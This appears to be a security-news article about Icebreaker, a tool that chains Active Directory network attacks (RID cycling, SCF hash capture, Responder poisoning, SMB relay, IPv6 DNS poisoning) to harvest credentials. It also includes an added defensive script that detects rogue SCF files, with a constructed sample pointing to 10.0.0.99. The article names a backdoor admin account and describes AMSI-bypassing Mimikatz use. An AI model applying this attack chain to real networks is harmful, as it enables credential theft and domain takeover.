Icebreaker automates network attacks against Active Directory to deliver plaintext credentials when you are inside the network but outside of the Active Directory environment. Cyber security researchers explain that Icebreaker performs 5 different network attacks to obtain plaintext credentials as well as hashes, and it autocracks any hashes it finds with JohnTheRipper and a custom 1 million password wordlist built specifically for Active Directory passwords.
RID cycling
Uses Nmap to find NULL SMB sessions
Performs asynchronous RID cycling to find valid usernames
Performs a 2-password reverse bruteforce of the found usernames
Passwords tested: P@ssw0rd and <season><year>, e.g., Winter2018
SCF file upload
Uses Nmap to find anonymously writeable shares on the network
Writes an SCF file to the share with a file icon that points to your device
When a user opens the share in Explorer, their hash is sent to you
Autocracks the hash with john and top 10 million password list
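The SCF upload step works because Explorer renders the icon of an .scf file it sees in a share and, when that IconFile is a UNC path, authenticates to the host named in it. A defender can audit writeable shares for exactly that pattern. The script below is an added example, not code from Icebreaker or from this article: it parses SCF text, extracts the host an IconFile would call out to, and walks a directory (for instance a mounted share) reporting .scf files pointing at hosts not on an allow-list. The sample files, host names and the 10.0.0.99 address are constructed for the demo.

```python
# Added example (not part of Icebreaker or the original article): scan a share
# for .scf files whose IconFile points at a UNC path on an untrusted host.
import re
import tempfile
from pathlib import Path

UNC_RE = re.compile(r"^\\\\([^\\]+)\\")  # captures the host in \\host\share\...

def parse_shell_section(text: str) -> dict:
    """Return lowercase key -> value pairs from the [Shell] section of SCF text."""
    keys, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif section == "shell" and "=" in line:
            k, v = line.split("=", 1)
            keys[k.strip().lower()] = v.strip()
    return keys

def scf_callout_host(text: str):
    """Host an IconFile entry would make Explorer connect to, or None if local."""
    m = UNC_RE.match(parse_shell_section(text).get("iconfile", ""))
    return m.group(1) if m else None

def scan_share(root, trusted_hosts=()):
    """Walk root and list (relative path, host) for .scf files calling out to untrusted hosts."""
    trusted = {h.lower() for h in trusted_hosts}
    hits = []
    for p in Path(root).rglob("*"):
        if not (p.is_file() and p.suffix.lower() == ".scf"):
            continue
        host = scf_callout_host(p.read_text(errors="replace"))
        if host and host.lower() not in trusted:
            hits.append((p.relative_to(root).as_posix(), host))
    return sorted(hits)

def demo():
    """Constructed sample share: one benign local-icon SCF, one calling out to 10.0.0.99."""
    benign = "[Shell]\r\nCommand=2\r\nIconFile=C:\\Windows\\explorer.exe,3\r\n"
    rogue = "[Shell]\r\nCommand=2\r\nIconFile=\\\\10.0.0.99\\share\\icon.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n"
    with tempfile.TemporaryDirectory() as root:
        (Path(root) / "desktop.scf").write_text(benign)
        (Path(root) / "docs").mkdir()
        (Path(root) / "docs" / "@readme.SCF").write_text(rogue)
        return scan_share(root, trusted_hosts=["fileserver01"])

if __name__ == "__main__":
    for path, host in demo():
        print(f"suspicious SCF {path} -> {host}")
```

Point scan_share at a mounted share and a list of your own file servers; any hit is a file that will make browsing users authenticate to a host you do not control.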
LLMNR/NBTNS/mDNS
Uses Responder.py to poison the layer 2 network and capture user hashes
Autocracks the hash with john and top 10 million password list
SMB relay
Uses ntlmrelay.py and Responder.py to relay SMB hashes
After a successful relay it will do the following on the victim machine:
Add an administrative user – icebreaker:P@ssword123456
Run an obfuscated and AMSI bypassing version of Mimikatz and parse the output for hashes and passwords
IPv6 DNS poison
Uses mitm6 and ntlmrelayx.py to poison IPv6 DNS and capture user and machine hashes
Creates fake WPAD server with authentication
This can easily cause network connectivity issues for users, so data security specialists recommend using it sparingly
How It Works
It will perform the above 5 network attacks in order. RID cycling and the SCF file upload usually complete quickly; it then lingers on attack 3, Responder.py, for 10 minutes by default. After that time, or the user-specified time, has passed, it moves on to the final two attacks, which run in parallel and indefinitely.
After performing RID cycling and the asynchronous bruteforce, it moves on to uploading SCF files to anonymously writeable shares. According to cyber security experts, if an SCF file was successfully uploaded and a user visits that file share in Explorer, the user's hash is captured and icebreaker attempts to crack it. If the hash is captured while attack 4, SMB relay, is running, the hash is relayed for potential command execution. Relaying a hash to another machine allows us to impersonate the user whose hash we captured, and if that user has administrative rights on the machine we relayed the hash to, we can execute commands there.
When ntlmrelayx relays a captured hash, it runs a base64-encoded PowerShell command that first adds an administrative user (icebreaker:P@ssword123456) and then runs an obfuscated, AMSI-bypassing version of Mimikatz. The Mimikatz output is parsed, and any plaintext passwords or NTLM hashes found are delivered to the user on standard output as well as in the found-passwords.txt file.
If icebreaker is run with the --auto flag, then upon reaching attack 4 it runs Empire and DeathStar in xterm windows. With this option, instead of running Mimikatz on the remote box we relayed the hash to, icebreaker adds an administrative user and immediately runs Empire's PowerShell launcher code to get an agent on the remote machine. DeathStar then uses this agent to automate the process of achieving domain admin. The Empire and DeathStar xterm windows will not close when you exit icebreaker.
Password cracking is done with JohnTheRipper and a custom wordlist. The wordlist was pruned to exclude passwords that are all lowercase, all uppercase or all symbols, shorter than 7 characters, or longer than 32 characters. These rules conform to the default Active Directory password requirements and brought the list from 20 million entries to just over 1 million, which according to data security professionals makes password cracking extremely fast.
IPv6 DNS poisoning: this attack is prone to causing issues on the network. It causes certificate errors in the browser on client machines, and it slows the network down. According to data security researchers, Windows AD environments are vulnerable by default.
Working as a cyber security solutions architect, Alisa focuses on application and network security. Before joining us she held cyber security researcher positions at a variety of cyber security start-ups. She also has experience in different industry domains such as finance, healthcare and consumer products.